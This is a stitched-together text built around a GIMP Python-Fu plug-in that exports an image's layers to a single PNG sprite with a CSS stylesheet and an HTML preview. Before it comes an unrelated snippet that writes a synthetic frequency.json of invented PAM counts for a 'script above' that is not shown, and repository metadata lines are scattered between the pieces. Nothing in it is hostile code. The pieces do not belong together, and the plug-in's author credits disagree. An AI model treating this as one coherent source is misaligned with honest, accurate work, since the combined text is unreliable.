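The script above consumes one or more frequency.json files and only reads a handful of keys from each: 'experiment', 'tag', 'template_seq', 'stats.hit_spacers_good_pam', and the per-PAM count mapping under 'pams'. The snippet below writes a minimal synthetic input with exactly that shape; every value is invented purely so the script has something well-formed to parse.

import json

example = {
    "experiment": "exp-01",            # only stored, not used in the ranking
    "tag": "sample-A",
    "template_seq": "ACGT" * 10,       # placeholder template sequence
    "stats": {"hit_spacers_good_pam": 1000},
    "pams": {"AGG": 120, "TGG": 95, "CGG": 300, "GGG": 15,
             "AAG": 4, "TAG": 2, "CAG": 40, "GAG": 9},
}

with open("frequency.json", "w") as f:
    json.dump(example, f, indent=4)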
UTF-8
Python
false
false
2,014
11,252,814,351,339
2b3bffcc3132329793781d033b7d8e74e969d1fd
25f0fbab74b5e9adbcae0aa097512c8538f93247
/plug-ins/export_layers_to_css.py
d0b9f7fc47b4cacbf4ce4858c48dc451b21c9a78
[]
no_license
rad73/gimp-export-layers-to-css
https://github.com/rad73/gimp-export-layers-to-css
4da54c393902dd9333ec8339e35af5b9c23ad5f8
8af36bf5e2a21df7fc56296061c9bdbfae77b47d
refs/heads/master
2021-05-11T17:59:56.018785
2012-08-01T17:56:06
2012-08-01T17:56:06
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
#!/usr/bin/env python # -*- coding: <utf-8> -*- # Author: Chris Mohler <[email protected]> # Copyright 2009 Chris Mohler # "Only Visible" and filename formatting introduced by mh # License: GPL v3+ # Version 1.0 # GIMP plugin to export layers as PNGs from gimpfu import * import os, re gettext.install("gimp20-python", gimp.locale_directory, unicode=True) class Css(object): def css_label(self, text): css_invalid_chars = re.compile("[^-_\w]") label = css_invalid_chars.sub('_', text.decode('utf-8').encode('ascii', 'ignore')) number_start = re.compile("^([0-9])") label = number_start.sub(lambda match: "_" + match.group(0), label) return label def find_name(self, text): name_pattern = re.compile("\.([-_\w]+)") match = name_pattern.search(text) if match: return match.group(1) else: raise Exception("Not named") def __init__(self, base_name, scale, only_named): self.layer_name_count = {} self.base_name = base_name self.graphics_name = self.css_label(base_name) self.image_filename = base_name + ".png" self.scale = scale self.only_named = only_named self.css = "" self.html = "" def add_layer(self, layer): if self.only_named: name = self.find_name(layer.name) else: name = self.css_label(layer.name) if name in self.layer_name_count: self.layer_name_count[name] += 1 name = "%s-%d" % (name, self.layer_name_count[name]) else: self.layer_name_count[layer.name] = 0 self.css += """ .{graphics_name}.{layer_name} {{ background-image: url({image_filename}); width: {width}px; height: {height}px; background-position: 0px {position_y}px; }}""".format(graphics_name=self.graphics_name, layer_name=name, image_filename=self.image_filename, width=int(layer.width / self.scale), height=int(layer.height / self.scale), position_y=-int(layer.offsets[1] / self.scale)) self.html += """ <tr> <td>{layer_name}</td> <td><div class="{graphics_name} {layer_name}"></div></td> </tr>""".format(graphics_name=self.graphics_name, layer_name=name) def save(self, path, image_width): self.save_css(path, image_width) self.save_html(path) def save_css(self, path, image_width): css_filepath = os.path.join(path, self.base_name + ".css"); self.css += """ .{graphics_name} {{ background-size: {width}px; }}""".format(graphics_name=self.graphics_name, width=int(image_width / self.scale)) with open(css_filepath, "wb") as f: f.write(self.css) def save_html(self, path): html_filepath = os.path.join(path, self.base_name + ".html"); self.html = """ <!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <title>Graphics</title> <style> table {{ border-collapse: collapse; }} td, th {{ border: dotted thin black; }} </style> <link rel="stylesheet" href="{base_name}.css"></link> </head> <p>elements with classes {graphics_name} and ...</p> <body> <table> <tr> <th>class</th> <th>element</th> </tr>""".format(base_name=self.base_name, graphics_name=self.graphics_name) + self.html + """ </table> </body> </html>""" with open(html_filepath, "wb") as f: f.write(self.html) def export_layers_to_css(img, drw, path, scale=1, only_named=False): base_name = "graphics-" + img.name.rsplit('.', 1)[0] pdb.gimp_message('Only named: %d'%only_named) dupe = img.duplicate() css = Css(base_name=base_name, scale=scale, only_named=only_named) def parse_layers(layers, level=0, offset_y=0): for layer in layers: layer.visible = True if hasattr(layer, "layers") and layer.layers: offset_y = parse_layers(layer.layers, level+1, offset_y) else: layer.set_offsets(0, offset_y) try: css.add_layer(layer) offset_y += layer.height except: layer.visible = False return offset_y offset_y = 
parse_layers(dupe.layers) merged_layer = dupe.merge_visible_layers(EXPAND_AS_NECESSARY) # pdb.gimp_message('Done. offset_y=%d image.height=%d'%(offset_y, merged_layer.height)) css.save(path=path, image_width=merged_layer.width) image_filename = base_name + ".png" image_filepath = os.path.join(path, image_filename); pdb.file_png_save(dupe, merged_layer, image_filepath, image_filename, 0, 9, 1, 1, 1, 1, 1) gimp.delete(dupe) register( proc_name=("python-fu-layers-to-css"), blurb=("Export Layers to one PNG with CSS stylesheet"), help=("""Export Layers to one PNG with CSS stylesheet """), author=("Per Rosengren"), copyright=("Stunning AB"), date=("2012"), label=("to _CSS"), imagetypes=("*"), params=[ (PF_IMAGE, "img", "Image", None), (PF_DRAWABLE, "drw", "Drawable", None), (PF_DIRNAME, "path", "Save PNG and CSS here", os.getcwd()), (PF_INT, "scale", "The scale of the image", 1), (PF_BOOL, "only_named", "Only export layers named .<name>", False), ], results=[], function=(export_layers_to_css), menu=("<Image>/File/E_xport Layers"), domain=("gimp20-python", gimp.locale_directory) ) main()
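Once registered, the plug-in can also be driven from GIMP's Python-Fu console rather than the File menu. The sketch below assumes that GIMP exposes the procedure registered as "python-fu-layers-to-css" on pdb with dashes converted to underscores, and all file paths and parameter values are examples only.

from gimpfu import *   # provides pdb, as in the plug-in above

img = pdb.gimp_file_load('/tmp/buttons.xcf', 'buttons.xcf')
drw = pdb.gimp_image_get_active_drawable(img)

# img, drw, output directory, scale, only_named (same order as the params list above)
pdb.python_fu_layers_to_css(img, drw, '/tmp/out', 1, False)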
UTF-8
Python
false
false
2,012